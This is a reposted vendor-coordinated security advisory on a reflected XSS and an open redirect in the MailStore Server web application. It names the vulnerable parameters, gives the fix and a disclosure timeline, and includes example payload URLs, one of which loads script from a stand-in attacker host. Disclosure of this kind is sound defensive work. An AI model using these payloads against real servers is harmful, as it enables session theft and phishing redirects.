MailStore 10.0.1 Cross Site Scripting / Open Redirect

2017.02.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server Affected Products MailStore Server Version 10.0.1.12148 was tested according to the vendor: - MailStore 9.2 to 10.0.1 is affected by the Reflected XSS Vulnerability - Mailstore 9.0 to 10.0.1 is affected by the Open Redirect Vulnerability References https://www.secuvera.de/advisories/secuvera-SA-2017-02.txt CWE-79 https://cwe.mitre.org/data/definitions/79.html CWE-601 https://cwe.mitre.org/data/definitions/601.html Summary: "MailStore Server is one of the worldas leading solutions for email archiving, management and compliance for small and medium-sized businesses." The in-built Webapplication does not properly validate untrusted input in several variables. This leads to both Reflected Cross-Site-Scripting (XSS) and an Open Redirect. Effect: To exploit the reflected XSS, the victim has to be authenticated to the Mailstore Webapplication. By clicking on a link sent to a victim, an attacker could for example copy the victims Session-ID to his on data sink. Sending another link with a crafted URL, the attacker could redirect the victim to a malicious website, while the link itself points to the trusted Mailstore-Address. The victim is not required to be authenticated. Vulnerable Scripts Reflected XSS for authenticated users: /search-result/, Parameters c-f, c-q, c-from and c-to /message/ajax/send/, Parameter recipient Vulnerable Script Open Redirect: derefer/, Parameter url Example for reflected XSS: https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E #Load external JS-Code https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E Example for Open Redirect: https://www.example.com:8462/a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de Solution: Update to Version 10.0.2 Disclosure Timeline: 2017/01/09 vendor contacted 2017/01/10 initial vendor response asking for technical details 2017/01/10 provided vendor with the advisory including technical details 2017/01/13 vendor provided informations about affected versions and mitigation 2017/01/18 update published by vendor 2017/01/31 public disclosure Credits: Tobias Glemser tglemser@secuvera.de secuvera GmbH https://www.secuvera.de Disclaimer: All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore secuvera shall not be liable for any direct or indirect damages that might be caused by using this information.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top